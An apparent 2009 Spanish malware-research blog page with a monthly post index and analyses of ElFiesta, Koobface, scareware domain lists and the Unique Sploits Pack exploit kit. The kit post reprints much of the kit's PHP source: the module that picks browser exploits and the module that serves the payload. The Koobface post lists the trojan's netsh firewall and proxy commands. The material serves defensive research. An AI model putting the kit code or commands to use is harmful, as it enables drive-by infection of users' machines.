Founder of MalwareIntelligence, a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

martes, 30 de junio de 2009

Compendio mensual de información. Junio 2009

Pistus Malware Intelligence Blog
29.06.09 ElFiesta. Reclutamiento zombi a través de múltiples amenazas
29.06.09
Una recorrida por los últimos scareware X
21.06.09 Simbiosis del malware actual. Koobface
14.06.09 Mirando de cerca la estructura de Unique Sploits Pack
13.06.09 Supuesto Códec para crear videos HD utilizado como carnada para scam
11.06.09 Una recorrida por los últimos scareware IX
07.06.09 Scareware. Repositorio de malware In-the-Wild
05.06.09 Comercio Ruso de versiones privadas de crimeware ¡Aproveche la oferta!
03.06.09 Pornografía. Excusa perfecta para la propagación de malware
02.06.09 Fusión. Un concepto adoptado por el crimeware actual
01.06.09 Botnet. Securización en la nueva versión de ZeuS


EvilFingers Blog
25.06.09 Symbiosis malware present. Koobface
10.06.09 Trade Russian version of private crimeware. Take the offer!
06.06.09 Pornography. Good excuse for spreading malware
04.06.09 Merger. A concept adopted by the current crimeware
02.06.09 Botnet. Securing the new version of Zeus


ESET Latinoamérica Blog
17.06.09 Técnicas de propagación que no pasan de moda
12.06.09 Curso Seguridad Antivirus en UTN Tucumán, Argentina
11.06.09 Scam a través de spam y documentos PDF
10.06.09 Presencia de ESET en el CNEISI 2009, Argentina
05.06.09 Presencia de ESET en Guatemala
02.06.09 Botnets. Una breve mirada al interior de ZeuS (III)

Información relacionada

Compendio mensual de información. Mayo 2009
Compendio mensual de información. Abril 2009
Compendio mensual de información. Marzo 2009
Compendio mensual de información. Febrero 2009
Compendio mensual de información. Enero 2009


# pistus

Ver más

lunes, 29 de junio de 2009

ElFiesta. Reclutamiento zombi a través de múltiples amenazas

ElFiesta es otro integrante de la familia de aplicaciones web, creada por desarrolladores rusos y puesta a disposición de los ciber-delincuentes, que permiten no sólo controlar y administrar cada una de las computadoras infectadas que forman parte de su red (zombis) sino que también ejecutar ataques vía web a través de diferentes técnicas que involucran la explotación de vulnerabilidades.

Uno de los módulos de ElFiesta posee como objetivo precisamente la propagación/infección a través de archivos PDF (Portable Document Format) que buscan vulnerabilidades en algunas versiones de Adobe Acrobat Reader.

En este caso, el archivo descargado se llama 4573.pdf (MD5: b7b7d52a205e950adf4795c14c7f7178), cuyo nombre es aleatorio, posee una tasa de detección del casi el 50%, por ende, una tasa de infección bastante importante por el momento.

Como se mencionó anteriormente, explota una vulnerabilidad (la CVE-2007-5659) que provoca un múltiple Desbordamiento de Búfer a través del archivo pdf previamente manipulado de manera maliciosa incrustando en el mismo un script en JavaScript que descarga y ejecuta un binario llamado load.exe (MD5: 5ee26f43139a2cdb3a79a835574285a0) desde /load.php?id=1118&spl=3.

Otro de los módulos que incorpora ElFiesta centra el ataque en un método scripting sometido a una técnica de ofuscación.

Realizando un análisis más profundo del caso, nos encontramos con una versión de ElFiesta recién implementada. En la siguiente captura se aprecia que la información estadística corresponde a nuestros datos.

Estos métodos son comunes a la mayoría de aplicativos crimeware de este estilo; sin embargo, apreciamos un detalle más que interesante: el dominio utilizado corresponde a un conocido scareware llamado XP Police Antivirus.

En consecuencia, la primera pregunta que viene a la mente es: XP Police Antivirus ¿colabora con el reclutamiento zombi de ElFiesta?

Más información
Fusión. Un concepto adoptado por el crimeware actual
Estrategia de infección agresiva de XP Police Antivirus
Campaña de propagación de XP Police Antivirus a través de Ingeniería Social Visual

# pistus

Ver más

Una recorrida por los últimos scareware X

Una vez más, los dominios expuestos en el presente constituyen tan sólo una mínima porción del volumen total de direcciones web empleadas para propagar scareware.


Nuestro objetivo se canaliza en exponer un conjunto de dominios que pueden ser empleados con fines investigativos, el bloqueo de los mismos o simplemente conocer cuáles son las amenazas de este estilo que han aparecido (o resurgido) durante los últimos días.

Virus Remover Professional
MD5: 19f19c24e0b065696bec1906bc8f0961
IP: 213.182.197.229
Latvia Latvia Riga Real_host_net
Dominios asociados:
avpro-labs .com

Result: 2/41 (4.88%)

MalwareDoc +
IP: 72.9.108.26
United States United States New York Ezzi.net
Dominios asociados:
mal-warexls .net
malware-safe .com
kingpinservers .info
internetware-safe .com



Antivirus Agent Pro
MD5: 24176f08a13e09495b163ac3343ebba8
IP: 83.133.126.46
Germany Germany Lncde-greatnet-newmedia
Dominios asociados
avagent-pro .com, actupdate .net, download-123 .cn, downloads-123 .com, t230.1paket .com, www.downloads-123 .com
Result: 15/41 (36.59%)

Personal Antivirus
IP: 208.76.56.56
United States United States Burlingame Everydns Llc
Dominios asociados
folderantispywarescanner .com
123vuilen .net
A1pro .hn
Bestlaostours .com


areascan4.info/download/install.php, finescan4.info/download/install .php, goalscan4.info/download/install.php, hardscan4.info/download/install .php, modescan4.info/download/install.php, onescan4.info/download/install .php, pagescan4.info/download/install.php, portscan4.info/download/install .php, scan4into.info/download/install.php (209.44.126.102) - Canada Laval Netelligent Hosting Services Inc

Descarga el binario "install.exe" (MD5: 6f4488dcb648054f3cf2a7a1bdbb44bf)
Result: 11/39 (28.21%)

av4best .net/?uid=106&pid=3, 7security.info/?uid=102&pid=3 (64.86.17.47) - Canada Brampton Velcom
best-adultnet .com/promo2 (91.212.132.11) - Serbia Interforum Ltd
fastpcscan3 .com/download.php?id=2022 (91.212.65.125) - Ukraine Eurohost Llc
fastpcscan3 .com/download/Setup-398_02022.exe (92.62.98.19) - Estonia Tallinn Collocation
powerantivirusscannerv2 .com/download/Setup-a5320fa_02018.exe (88.198.41.170) - Germany Gunzenhausen Hetzner-rz-nbg-net

safetywwwtools .com/hitin.php?land=98&affid=16100 (209.44.126.36) - Canada Laval Netelligent Hosting Services Inc
Result: 12/41 (29.27%)

avprotectionstat .com/index.php (74.50.99.236) - United States Tampa Noc4hosts Inc
registerantivirus .com (74.50.98.152) - United States Tampa Noc4hosts Inc
youravprotection .com/support (74.50.98.162) - United States Tampa Noc4hosts Inc
allfet .info/antispyware (208.100.34.148) - United States Chicago Nozone Inc
suprotect .com/hitin.php?land=20&affid=02909 (89.149.212.218) - Poland Netdirect-net-exportal
activeantivir .com (78.159.114.189) - Germany Berlin Netdirekt E.k
antivirusfolderscanner .com (69.4.230.205) - United States Chicago Hosting Services Inc
apoiweh .cn/x_private_backtraffnail.php/?uid=102 (222.73.219.74) - China Beijing Chinanet Shanghai Province Network
blanket.bitelere.us (93.190.142.134) - Netherlands Schiedam Worldstream

Antivirus Best
MD5: eba5ca538be5b69f59f4de9ae8a21f5f
IP: 174.142.113.205
Canada Canada Montreal Iweb Technologies Inc
Dominios asociados
best-protect .info, av-protect.info
run.best-protect.info, scanner.av-protect.info
scanner.best-protect.info, download.best-protec.info

Result: 20/41 (48.78%)


Información relacionada
Una recorrida por los últimos scareware IX
Una recorrida por los últimos scareware VIII
Una recorrida por los últimos scareware VII
Una recorrida por los últimos scareware VI
Una recorrida por los últimos scareware V
Una recorrida por los últimos scareware IV
Una recorrida por los últimos scareware III
Una recorrida por los últimos scareware II
Una recorrida por los últimos scareware

# pistus

Ver más

domingo, 21 de junio de 2009

Simbiosis del malware actual. Koobface

Koobface es un gusano diseñado a explotar los perfiles de usuarios de populares redes sociales como MySpace y FaceBook con la finalidad de obtener información sensible y confidencial de sus víctimas; aunque las versiones más recientes limitan su objetivo a FaceBook. De hecho, la palabra Koobface es una transposición de la palabra Facebook.

Sus primeras versiones datan de fines de 2008 y desde ese entonces continúa In-the-Wild con un índice de infección preocupante. Tal es así que la misma compañía dio a conocer una serie de
medidas preventivas tendientes a minimizar el potencial riesgo de infección, que constantemente se encuentra latente para los usuarios que hacen uso de la red social.

En principio, el medio de diseminación habitual que utiliza Koobface es vía web a través de Ingeniería Social Visual y constituye la primera faceta de propagación.
La segunda faceta (infección) canaliza sus acciones maliciosas en una característica muy común en la actualidad, que se basa en la conjunción de malware, generando una simbiosis donde cada uno de los componentes del ambiente despliegan instrucciones particulares que buscan un objetivo común y general.

Pero veamos cuáles son esos componentes que forman parte de la etapa de infección de la variante Koobface.NBO.
Este gusano. detectado actualmente por aproximadamente 31 compañías antivirus de 41 (75.61%), al infectar el sistema establece conexión con las siguientes URL's:
  • http://oberaufseher.net/img/cmd.php
  • http://pornfat.net/img/cmd.php
También descarga los siguientes códigos maliciosos:
  • TrojanDownloader.Small.OCS Troyano
  • Tinxy.AD Troyano
  • Tinxy.AF Troyano
  • BHO.NOE Troyano
  • Koobface.NBH gusano
  • PSW.LdPinch.NEL Troyano
Desde el punto de vista técnico, se pueden establecer algunos datos recolectados del breve análisis preliminar de cada uno de los códigos maliciosos descargados por Koobface:

El troyano TrojanDownloader.Small.OCS posee una tasa de detección de 35/40 (87.5%)
crea claves en el registro y realiza una copia de sí mismo.
  • HKLM\SOFTWARE\Microsoft\MSSMGR\
  • HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify\winccf32
  • C:\WINDOWS\system32\winccf32.dll (copia de sí mismo).
Tinxy.AF, otro troyano, también crea archivos en el sistema y posee una tasa de detección levemente menor al anterior, 30/40 (75.00%).
  • C:\windows\ld09.exe
  • C:\docume~1\user\locals~1\temp\podmena.bat
El troyano Tinxy.AD posee un índice de detección de 35/40, aproximadamente es detectado por el 87.50% de los antivirus. Crea una copia de sí mismo y hace uso de la herramienta NetShell para habilitar una DLL, abrir puertos y especificar un proxy.
  • C:\WINDOWS\system32\SYSDLL.exe (copia de sí mismo)
  • netsh add allowedprogram "SYSDLL" C:\WINDOWS\System32\SYSDLL.exe ENABLE
  • netsh firewall add portopening TCP 80 SYSDLL ENABLE
  • netsh firewall add portopening TCP 7171 SYSDLL ENABLE
  • netsh winhttp set proxy proxy-server="http=localhost:7171" Agrega la información del proxy en:HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7171" /f
BHO.NOE, es otro de los troyanos que forman parte del proceso de infección de Koobface, con una tasa de detección del 92.11% (35/38), crea una carpeta y un archivo.
  • C:\WINDOWS\system32\796525
  • C:\WINDOWS\system32\796525\796525.dll
En cuanto al troyano PSW.LdPinch.NEL, detectado por 34 antivirus de 40 (85.00%), está diseñado para robar contraseñas de diferentes navegadores web, clientes de correo, clientes de mensajería instantánea y otros servicios.

Por último, descarga una variante de la familia, el gusano Koobface.NBH, en este caso, la tasa de detección es de 27/40 (aprox. 67.50%).

Como podemos apreciar, la infección de este código malicioso no se limita sólo a las instrucciones maliciosas que posee, sino que va más allá y descarga otros. Este accionar constituye un comportamiento común en la actualidad, donde la fusión de aplicativos web de control y administración de botnets y la de diferentes tipos de malware, unen fuerzas con un mismo objetivo: aumentar la economía de los delincuentes informáticos.

# pistus

Ver más

domingo, 14 de junio de 2009

Mirando de cerca la estructura de Unique Sploits Pack

Unique Sploits Pack es un paquete crimeware del cual en este Blog dimos cuenta en varias oportunidades.

Este Kit, de origen ruso, se comercializa en el mercado a un costo de USD 750 la versión full que incorpora una aplicación de cifrado y el “beneficio” de acceder a las actualizaciones, siendo la versión actual de este crimeware la 1.5. Incluso, hasta hace poco, su comercialización se realizaba vía web a través de un sitio llamado unpack.ws (actualmente inactivo), donde era la versión 1.4 la comercializada en ese entonces.

A pesar del valor que actualmente posee Unique Sploits Pack, en algunos foros es posible encontrar un esquema de comercialización a través de ICQ, incluso, conseguir alguno de los combos con varios Kits de este estilo a un precio que, para los costos que manejan los desarrolladores de crimeware, puede representar una verdadera ganga.

Esta información nos da una idea global de cómo es el esquema de venta de estos, cada vez más comunes, aplicativos web que sientan las bases del comercio clandestino de crimeware.

Pero dejemos por un momento a un costado todo lo referido a la industria que se encuentra detrás y miremos un poco más de cerca cómo se encuentra estructurado Unique Sploits Pack.

Si bien este paquete no es muy diferente de otros, cada uno de los módulos que lo conforman corresponde a un archivo PHP, de los cuales, quizás se destaca el que permite diseminar malware empleando una estrategia de Ingeniería Social visual similar a las utilizadas por el scareware:
  • Módulo config.php: posee la configuración que indica desde qué URL y qué malware se intentará diseminar. En este módulo también se configura el esquema de autenticación que tendrá la base de datos y el login al panel de control/administración.
  • // ENLACE AL MODULO load.php
    $url='http://XX.XX.XX.XX/XX/load.php';
    // ENLACE AL MODULO pdf.php
    $pdf='http://XX.XX.XX.XX/XX/pdf.php';
    // BINARIO
    define('EXE', '1.exe');
    define('Unique', 'go-go-go'); // don't edit
    // ACCESO A MySQL
    $db_host='';
    $db_name='';
    $db_user='';
    $db_pass='';
    // ACCESO AL PANEL DE CONTROL
    $cp_url='admcp.php';
    $cp_user='';
    $cp_pass='913f8cfc77c2c974cc3a838cde8c7e6b';
  • Módulo _install.php: posee los scripts necesarios para crear y configurar las tablas para la base de datos.
  • include ("cfg/config.php");
    if (!($c = mysql_connect($db_host, $db_user, $db_pass))) {
    die("Check host, user or password (./cfg/config.php)");
    if (!mysql_select_db($db_name,$c)) {
    die("Check DB name (./cfg/config.php)");
    if (!mysql_query("DROP TABLE IF EXISTS
    statistic
    ;",$c)) die("Check permission for user '".$db_user."'");
    if (!mysql_query("CREATE TABLE
    statistic
    int(10) NOT NULL auto_increment,
    varchar(15) default NULL,
    varchar(30) default NULL,
    varchar(30) default NULL,
    country
    varchar(2) default '--',
    int(1) NOT NULL default '0',
    refer
    varchar(300) NOT NULL,
    datetime default 'XXXX-XX-XX 00:00:00',
    PRIMARY KEY (
    ) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO_INCREMENT=1;",$c)) die("Check permission for user '".$db_user."'");
    die(" //SIGUE

  • Módulo options.php: identifica el navegador, el sistema operativo y el país; este último, en base al módulo GeoIP. También codifica la función Unicode del JS y especifica la página de error 404.

  • Módulo index.php: detecta la presencia de _install.php y lo ejecuta, además de verificar que no se realice la instalación a través de la misma dirección IP. Si detecta la misma dirección IP, aborta el proceso y ejecuta el módulo options.php mostrando error 404.
  • error_reporting(0);
    if (file_exists("install.php")) {
    include ("install.php");
    include'cfg/options.php';
    include'cfg/config.php';
    $ip = $_SERVER['REMOTE_ADDR'];
    mysql_connect($db_host, $db_user, $db_pass);
    mysql_select_db($db_name);
    $q = mysql_query("select ip from statistic where ip='$ip'");
    $n = mysql_num_rows($q);
    @mysql_free_result($q);
    if ($n != 0) exit($page404);
    $country = detect_country($ip);
    $br = browser();
    $os = os();
    @$purl = $_SERVER['HTTP_REFERER'];
    $ref=parse_url($purl);
    @$ref=$ref['host'];
    $q = mysql_query("insert into statistic (date, ip, os, br, country, refer) values ('".date("Y-m-d H:i:s", time())."', '".$ip."', '".$os."', '".$br."', '".$country."','".$ref."')");
    @mysql_free_result($q);
    include ("sploits.php");

  • Módulo sploits.php: el objetivo principal del módulo es configurar los exploits que se van a ejecutar; pero también chequea que exista el nombre "Unique". Si no lo encuentra muestra error 404 ejecutando el módulo options.php.
  • if (!defined('Unique')) {
    die ($page404);
    if (eregi("(opera)[ /]([0-9]{1,2}).([0-9]{1,3})",$br,$index)){
    if (($index[2]=="9") && ($index[3]>="51") && ($index[3]<="61")) { // include_once(_NEW_SPLOIT_); // echo "DEL ME!!! NEW SPLOIT WORK"; // if (($index[2]=="9") && ($index[3]>"21")) {
    include_once("./sploit/op9.php");
    if (eregi("firefox",$br)){
    include_once("./sploit/ff.php");
    if (eregi("IE 7",$br)){
    include_once("./sploit/ie7.php");
    if (eregi("IE 6",$br)){
    include_once("./sploit/ie.php");
    if (eregi("IE 5",$br)){
    include_once("./sploit/ie.php");
    if (eregi("IE 4",$br)){
    include_once("./sploit/ie.php");

  • Módulo admcp.php: define el acceso a la aplicación web a través de un esquema de autenticación, solicitando nombre de usuario y contraseña, previamente definidos en el módulo config.php.

  • Módulo geoip.php: identifica el país del sistema zombi a través de un ID.
  • "IT" => 108, "JM" => 109, "JO" => 110, "JP" => 111, "KE" => 112, "KG" => 113, "KH" => 114, "KI" => 115, "KM" => 116, "KN" => 117, "KP" => 118, "KR" => 119, "KW" => 120, "KY" => 121, "KZ" => 122, "LA" => 123, "LB" => 124, "LC" => 125, "LI" => 126, "LK" => 127, "LR" => 128, "LS" => 129, "LT" => 130, "LU" => 131, "LV" => 132, "LY" => 133, "MA" => 134, "MC" => 135, "MD" => 136, "MG" => 137,"MH" => 138, "MK" => 139, "ML" => 140, "MM" => 141, "MN" => 142, "MO" => 143, "MP" => 144, "MQ" => 145, "MR" => 146, "MS" => 147, "MT" => 148, "MU" => 149, //SIGUE HASTA EL 250
  • Módulo load.php: actualiza la columna "good" de la base de datos y ejecuta los scripts según lo definido en el archivo de configuración.
  • error_reporting(0);
    include ("cfg/config.php");
    $fsize = filesize(EXE);
    $dd=fopen(EXE, "r");
    $ss=fread($dd,$fsize);
    fclose ($dd);
    header("Accept-Ranges: bytes");
    header("Content-Length: ".$fsize."");
    header("Content-Disposition: inline; filename=".EXE);
    header("Content-Type: application/octet-stream");
    echo ($ss);
    $ip = $_SERVER['REMOTE_ADDR'];
    mysql_connect($db_host, $db_user, $db_pass);
    mysql_select_db($db_name);
    $q = mysql_query("update statistic set good=1 where ip='".$ip."'");
    @mysql_free_result($q);

  • Modulo pdf.php: contienen un exploit para la vulnerabilidad mencionada en CVE-2008-2992 para Adober Reader que intenta explotar en el sistema a través de un archivo PDF. El código php de este módulo se encuentra sometido a un proceso de ofuscación
  • hAvBwcGxpY2EG0S8EsANhAEEFOmRpZSiAABYlPz4=")); ?>
  • Módulo vparivatel.php: ejecuta una metodología de Ingeniería Social cuyos mensajes pueden ser completamente personalizada para ganar la confianza de la víctima.
  • Módulo mod_vparivatel.php: contiene la configuración del módulo vparivatel.php.
En relación directa con los exploits que incorpora por defecto el aplicativo, ellos son:
  • MDAC para IE 6
  • PDF exploit para IE 7, Opera y Firefox
  • PDF exploit para Adobe Acrobat 9
  • PDF Doble. Descarga de manera simultánea dos exploits en PDF
  • MS Office Snapshot para IE 6 y 7
  • IE 7 XML SPL
  • Firefox Embed
  • IE 7 Uninitialized Memory Corruption Exploit. Nuevo exploit incorporado en la v1.5 de USP
  • SPL Amaya 11
  • Foxit Reader 3.0. PDF Buffer Overflow Exploit (Universal) para todos los navegadores
Como vemos, la estructura de Unique Sploits Pack (que repito, no es muy diferente a otros crimeware de este estilo) es bastante compleja y engloba todo un conjunto de scripts maliciosos destinados a transformar en zombis, de una forma u otra, cuantos sistemas puedan.

Información relacionada
Botnet. Securización en la nueva versión de ZeuS
Fusión. Un concepto adoptado por el crimeware actual
Unique Sploits Pack. Manipulando la seguridad del atacante II
Adrenalin botnet: zona de comando. El crimeware ruso marca la tendencia
Chamaleon botnet. Administración y monitoreo de descargas
YES Exploit System. Otro crimeware made in Rusia
Unique Sploits Pack. Crimeware para automatizar la explotación de vulnerabilidades
Creación Online de malware polimórfico basado en PoisonIvy

# pistus

Ver más

sábado, 13 de junio de 2009

Supuesto Códec para crear videos HD utilizado como carnada para scam

Si cuando hablamos de malware nombramos a los códec, lo primero que recordamos es la inmensa cantidad de troyanos, scareware y demás código viral que a través de Ingeniería Social visual intenta comprometer los equipos de los internautas.

Sin embargo, la fama que suponen los códecs como herramientas de video hace que la temática maliciosa se extienda a otros planos. Como el presente caso, donde el objetivo es el fraude.

Se trata de un sitio web que promociona una herramienta supuestamente concebida para crear y reproducir video de alta definición a través de la tecnología H.264 (MPEG4 AVC). Expresamente, el mensaje que se dispone en la página es el siguiente:

“We're now introducing the next generation of VSCodecPRO technology with VSCodecPRO ? our new software that lets you create and play full HD H.264 (MKV) videos. H.264 is a new standard that is poised to power the high definition video revolution by offering incredible visual quality, performance and efficiency. VSCodecPRO gives you all the tools you need to take full advantage of H.264 for a truly cinematic video experience.”

Algo así como:

“Estamos presentando la próxima generación de VSCodecPRO con tecnología VSCodecPRO. Nuestro nuevo software le permite crear y reproducir videos HD H.264 (MKV). H.264 es un nuevo estándar que se dispone a alimentar la revolución de video de alta definición, ofreciendo calidad visual increíble, rendimiento y eficiencia. VSCodecPRO le da todas las herramientas que necesita para sacar el máximo provecho de H.264 para una verdadera experiencia de cine en vídeo.”

Hasta aquí todo muy lindo y una excelente alternativa para los amantes de los videos en buena calidad o para aquellos profesionales que se dedican a mejorar la calidad de sus trabajos visuales. Claro está, siempre y cuando la propuesta sea verdad. ;-P

La cuestión es que cuando nos proponemos a descargar el “mágico” programa haciendo clic sobre el botón correspondiente, no sucede nada; es decir, no logramos descargar el programa. Pero sí encontramos un enlace con la leyenda “buy it now” que incita a la compra del mismo.

Es en este momento donde comienza a gestarse un fraude, ya que la aplicación fraudulenta posee un costo; ofreciéndose dos alternativas de “compra”: una licencia por 180 días a USD 49.99, y otra full por USD 79.99.

Al seleccionar cualquiera de las dos opciones, aparece el formulario solicitando información sensible y financiera del internauta. Una vez concluida la solicitud y luego de enviar la información expuesta, la devolución es un error de procesamiento, donde los reclamos, o mejor dicho, a dónde reclamar, no existe.

Al profundizar un poquito más, sale a la luz que la dirección IP (91.212.65.29) del sitio, es compartida con otros dominios como:

antivirus-2009-ppro .com
antivirus-pppro .com
antivirus-scan-2009 .com
antivirus-xppro-2009 .com
antivirus-xppro2009 .com
onlinescanxppp .com
scan-virusremover2009 .com

Todos conocidos por la diseminación del scareware Antivirus XP Pro 2009.

Este tipo de estrategias delictivas son extremadamente comunes en Internet, siendo muy empleadas por cibercriminales que utilizan aplicativos scareware como excusa para llevar a cabo maniobras fraudulentas similares.

Los delincuentes informáticos no dejan de pensar en ideas que le permitan acrecentar la economía en sus bolsillos, ni de agregar “servicios” y alternativas a la industria del malware.

# pistus

Ver más

jueves, 11 de junio de 2009

Una recorrida por los últimos scareware IX

Pequeña muestra de dominios utilizados para diseminar scareware de todo tipo. El conjunto de dominios expuestos en este, y en cada uno de los post relacionados, representa solo una mínima parte del inmenso caudal de amenazas de este estilo que día a día intentan encontrar cibernautas desprevenidos.

Adware Professional
MD5: cd825dbc50e170b1d9e8902af3cce923
IP: 72.20.110.8
United States United States Santa Clara Netblue
Dominios asociados
adwareprofessional .com

Result: 2/40 (5.00%)

Advanced Virus Removed

MD5: 6883312a7344872230e1f4d4dd1137eb
IP: 91.212.65.29
Ukraine Ukraine Eurohost Llc
Dominios asociados
advanced-virusremover2009 .com

Result: 3/40 (7.50%)
Registry Cleaner Pro
MD5: 4fdcee2deb2051546ddb60e4c5fbb2be
IP: 72.167.232.44
United States United States Scottsdale Godaddy.com Inc
Dominios asociados
clean-windows-vista.com, registry-cleaner-2009.com, internet-explorer-cleaner.com, registrycleanerpro.org

Result: 7/40 (17.50%)

XP Deluxe Protector
MD5: 7e5bc3a017a524d7810113534cf2dcdb
IP: 91.212.65.140
Ukraine Ukraine Eurohost Llc
Dominios asociados
deluxe-protector .com, deluxe-protector .com, securebillingpayment .com, winpc-antivirus09 .com, winpcantivirus-2009 .com, winpcantivirus2010 .com
Result: 27/40 (67.50%)

Malware catcher
IP: 64.213.140.69
United States United States Global Crossing
Dominios asociados
malwarecatcher .net, prestotuneup .com, scan-ultraantivirus2009 .com, update1.virusalarmpro .com, update2.prestotuneup.com, updvms .cn, promo.fastantivirus09 .com

GuardDog Computing Inc
IP: 85.114.141.207
Germany Germany Berlin Fastit-de-dus1-colo
Dominios asociados
guarddog2009 .com

Result: 27/39 (69.24%)



Antivirus 360
MD5: 3dae34ea276abbc5e3364627458a4111
IP: 64.191.92.197
United States United States Scranton Network Operations Center Inc
Dominios asociados
removevirusonline .com, 1-againstspy .net
1-agentprotect .net, 1-antispystore .com

Result: 25/39 (64.10%)



web1.noadware.net (69.20.104.139) - United States Township Plexi Communications
web2.noadware.net (69.20.71.83) - United States Rackspace.com Ltd
winpcantivirus2010.com (91.212.65.140) - Ukraine Eurohost Llc
addedantivirus.com, ascertaindiseasepro.cn, atioqe.cn (91.212.41.114)
anti-spyware-scan-v1.com (67.215.66.132) - Russian Federation Llc Gaztransitstroyinfo
inetavirus.com (209.44.111.57) - Canada Laval Netelligent Hosting Services Inc
juicypussyclips.com (209.44.126.241) - Canada Laval Netelligent Hosting Services Inc
kalambler.ru (89.108.83.12) - Russian Federation Agavacompany


Información relacionada

Una recorrida por los últimos scareware VIII
Una recorrida por los últimos scareware VII
Una recorrida por los últimos scareware VI
Una recorrida por los últimos scareware V
Una recorrida por los últimos scareware IV
Una recorrida por los últimos scareware III
Una recorrida por los últimos scareware II
Una recorrida por los últimos scareware

# pistus

Ver más